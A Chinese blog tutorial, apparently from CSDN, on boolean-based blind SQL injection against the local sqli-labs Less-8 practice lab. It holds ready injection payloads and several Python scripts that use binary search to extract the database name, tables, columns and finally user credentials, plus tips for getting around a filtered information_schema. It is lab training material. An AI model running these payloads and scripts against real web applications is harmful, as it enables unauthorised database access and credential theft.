SQL布尔盲注

已于 2024-08-06 09:43:47 修改
阅读量940 收藏 17
点赞数 27
文章标签: sql 数据库
于 2024-08-05 16:09:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78549931/article/details/140923751
版权

目录

1 布尔盲注

2布尔盲注流程

2.1输入id进行测试

 2.2判断注入类型

2.3爆数据库名

2.4爆表名

2.5爆字段名

 2.6查询数据

1 布尔盲注

布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,如果正确执行了构造的SQL语句,则返回一种页面,如果错误,则执行另一种页面。基于两种页面,来判断SQL语句正确与否,达到获取数据的目的。

2布尔盲注流程

2.1输入id进行测试

输入?id=1,发现页面回显You are in..........

输入?id=1',发现页面无显示

此时,联想到正确错误两个页面,采用布尔盲注

 2.2判断注入类型

1.?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

2.?id=1' and 1=1--+和?id=1' and 1=2--+进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

 根据结果可判断为字符型注入

2.3爆数据库名

如何获取数据库呢?可以通过截取字符串的方式进行获取。substr(string, start, length) 截取字符串,这个函数的意思简单来说,截取一个字符串从'start'位,可以是第1位,第2位。。。。每次截取'length'个字符。然后使用ascii()函数。其作用是将字符转换成对应的ascii值。

?id=1' and ascii(substr(database(),1,1))=97--+

如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面

页面无显示说明数据库名的第一个字符的ascii码值不等于97

我们可以编写一个简单的python脚本就可以爆破出数据库名

import time

import requests

url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

根据运行结果得出数据库名为'security' 

2.4爆表名

使用count() 函数进行获取表的数量

1' and (select count(table_name) from information_schema.tables where table_schema='security')=2--+

1' and (select count(table_name) from information_schema.tables where table_schema='security')=4--+

可以看出security下有四张表,然后进行爆表名

1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=101--+

 mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

 sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

然后编写一个简单的python脚本就可以爆破出所有的表名

import requests

url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'


def boolean_blind_inject(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data

            # 发送 GET 请求
            r = requests.get(url, params=params)

            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)

# 调用函数
boolean_blind_inject(url)

上述代码采用二分法提高效率 

根据运行结果得出表名为emails,referers,uagents,users

2.5爆字段名

根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。

同样使用python脚本来爆破出字段名,只需将刚才的python脚本中的payload变换一下

import requests

url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'


def boolean_blind_inject(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data

            # 发送 GET 请求
            r = requests.get(url, params=params)

            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)

# 调用函数
boolean_blind_inject(url)

根据运行结果得出字段名为id,username,password

 2.6查询数据

import requests

url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'


def boolean_blind_inject(url):
    name = ''
    for i in range(1, 200):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(username,id,password) from users),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data

            # 发送 GET 请求
            r = requests.get(url, params=params)

            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)

# 调用函数
boolean_blind_inject(url)

这样我们就爆出各个用户的账号密码了,本次手布尔盲注到此结束,如果不会写python脚本也可以使用BurpSuite工具来破解数据,感兴趣的同学可以自行搜索相关资料学习。

半ོ糖ོ
关注
  • 27
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3029
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
SQL注入布尔盲注
qq_45557130的博客
10-04 788
sql注入布尔盲注
SQL盲注布尔盲注
Dug123456_的博客
04-07 1365
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL注入-布尔盲注
weixin_45095113的博客
03-12 775
布尔盲注
SQL注入——布尔盲注
TGFXK的博客
03-21 299
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
SQL注入-布尔盲注
acepanhuan的博客
02-10 1723
学习SQL注入方法之盲注
SQL 布尔盲注
qq_42378173的博客
10-11 1305
SQL 布尔盲注
sql盲注_布尔盲注
sugar_by的博客
06-02 455
盲注:页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行sql注入 盲注分类:布尔盲注、时间盲注、报错盲注 布尔注入:web页面只返回true真,false假俩种类型。利用页面返回不同,逐个猜解数据 查询命令可以执行但是不会返回,使用ascii()函数把字符转变为ascii表对应的数字 substr((),)函数,substr((batabase()),1,1) substr(数据库/字符串,输出第一个字符,一次输出一个字符) 猜第一个是那个字符 说明第一个字符就在
SQL盲注--布尔盲注
Auroraxsn的博客
04-27 3015
一、布尔盲注 1.特征: 某些网站输入参数后会判断,然后根据结果是或非返回页面。即普通注入只会返回其他页面,并没有回显 2.解决原理: 用函数(regexp,like,ascii,left,ord,mid,length)猜相关信息,正确时与错误时返回页面不一样,根据返回的页面来判断正确的数据信息。 3.基本流程 (1.判断注入类型 (2.判断列数 (3.获取数据库长度 构建有关数据库名的表达式,看页面返回情况判断表达式对错 length(str) 函数,返回字符串的长度 ...
SQL注入之布尔盲注
DM766924的博客
09-13 1579
什么是布尔判断SQL注入? “布尔判断”指的是利用SQL语句**逻辑与(and)**操作,判断and两边的条件是否成立,SQL语句带入输入库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态。 布尔盲注步骤: 第1步:确认注入点 方法:通过增加 ’ 和增加--+注释符,语句从执行失败变为执行成功判断注入点 第2步:判断数据库版本 方法:主要因为5.0版本以下没有information_schema数据库,无法进行手动注入; 由于无法回显数据,利用逻辑
sql注入之布尔盲注
最新发布
weixin_45653478的博客
04-09 1517
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a。substr(abcd,2,1) 从第二位开始,截取一个字符,就是b。抓包并发送intruder。设置多个payload集合。
SQL注入之布尔盲注
qq_45076423的博客
11-12 441
布尔盲注 如果确定页面注入点存在,如果页面没有回显并且没有报错信息可以考虑使用布尔盲注布尔盲注的判断条件是页面布尔类型状态。 当传递参数[?id=1' and 1=1 --+] 当传递参数[?id=1’ and 1=2 --+] 比较两次的传递的参数,页面明显存在差异(布尔类型状态)。 利用这个差异,我们可以一点一点得到数据库的内容。例如想要获取当前数据库的名字。 1. 判断数据库名字的...
sql注入之 布尔盲注
qq_46185846的博客
02-14 215
一:布尔盲注 盲注,就是在服务器没有错误回显是完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的信息,所以攻击者必须找到一个方法来验证注入的sql语句是否得到了执行。 注入原理 布尔忙住一般适用于 页面没有回显字段(不支持联合查询),而且web页面返回true或者false,构造sql语句 利用and or 等关键词来时web页面返回true或者false,从而达到注入的目的来获...
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值